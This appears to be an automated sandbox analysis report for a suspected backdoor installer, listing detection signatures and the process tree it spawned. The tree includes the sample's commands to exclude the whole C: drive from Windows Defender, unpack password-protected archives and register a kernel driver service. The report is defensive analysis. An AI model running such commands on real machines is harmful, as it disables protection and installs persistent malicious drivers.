Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
#U5b89#U88c5#U52a9#U624b_2.0.7.exe

Overview

General Information

Sample name:#U5b89#U88c5#U52a9#U624b_2.0.7.exe
renamed because original name is a hash value
Original sample name:_2.0.7.exe
Analysis ID:1579756
MD5:b7289fd08cd04c771fd7c9b06477601a
SHA1:a5b1ad8ed22e819341cadcc8a13ea34cf8a79eb1
SHA256:a9c6e43902b74d84e8492006beaf718380a1550cfd545a2de6bfc95d69016e28
Tags:backdoorexesilverfoxwinosuser-zhuzhu0009
Infos:

Detection

Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to hide a thread from the debugger
Found driver which could be used to inject code into processes
Hides threads from debuggers
Loading BitLocker PowerShell Module
PE file contains section with special chars
Protects its processes via BreakOnTermination flag
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: New Kernel Driver Via SC.EXE
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • #U5b89#U88c5#U52a9#U624b_2.0.7.exe (PID: 7276 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe" MD5: B7289FD08CD04C771FD7C9B06477601A)
    • #U5b89#U88c5#U52a9#U624b_2.0.7.tmp (PID: 7292 cmdline: "C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp" /SL5="$20452,4740784,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe" MD5: CCFB5265302C0ED10D4EE3C9C00B07B1)
      • powershell.exe (PID: 7312 cmdline: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 7512 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • #U5b89#U88c5#U52a9#U624b_2.0.7.exe (PID: 7584 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe" /VERYSILENT MD5: B7289FD08CD04C771FD7C9B06477601A)
        • #U5b89#U88c5#U52a9#U624b_2.0.7.tmp (PID: 7600 cmdline: "C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp" /SL5="$2046A,4740784,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe" /VERYSILENT MD5: CCFB5265302C0ED10D4EE3C9C00B07B1)
          • 7zr.exe (PID: 7684 cmdline: 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 7716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • 7zr.exe (PID: 7784 cmdline: 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 7792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7648 cmdline: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7664 cmdline: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7868 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7884 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7900 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7928 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7996 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8012 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8064 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8080 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8132 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8148 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4124 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4280 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5236 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5356 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6036 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2840 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3492 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3632 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7324 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2836 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7452 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4592 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 332 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7308 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7648 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7696 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7676 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7764 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7796 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7856 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7816 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7792 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7952 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7908 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8004 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8028 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8072 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8128 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8132 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3140 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 280 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2080 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3064 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5236 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6036 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7864 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7328 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3632 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7152 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6420 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2872 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4476 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7304 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7660 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7696 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7668 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7800 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7716 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7364 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7372 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7868 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7560 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7852 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp" /SL5="$20452,4740784,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp, ParentProcessId: 7292, ParentProcessName: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 7312, ProcessName: powershell.exe
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7648, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 7664, ProcessName: sc.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp" /SL5="$20452,4740784,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp, ParentProcessId: 7292, ParentProcessName: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 7312, ProcessName: powershell.exe
Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7648, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 7664, ProcessName: sc.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp" /SL5="$20452,4740784,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp, ParentProcessId: 7292, ParentProcessName: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 7312, ProcessName: powershell.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.exeVirustotal: Detection: 9%Perma Link
Source: Submited SampleIntegrated Neural Analysis Model: Matched 86.1% probability
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000C.00000003.1817031002.0000000003490000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.1817308914.0000000003690000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 6_2_6CCF98B0 FindFirstFileA,FindClose,FindClose,6_2_6CCF98B0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_005A6868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,10_2_005A6868
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_005A7496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,10_2_005A7496
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000001.00000003.1780028810.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000001.00000003.1780028810.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000001.00000003.1780028810.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000001.00000003.1780028810.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000001.00000003.1780028810.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000001.00000003.1780028810.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000001.00000003.1780028810.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000001.00000003.1780028810.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000001.00000003.1780028810.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000001.00000003.1780028810.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
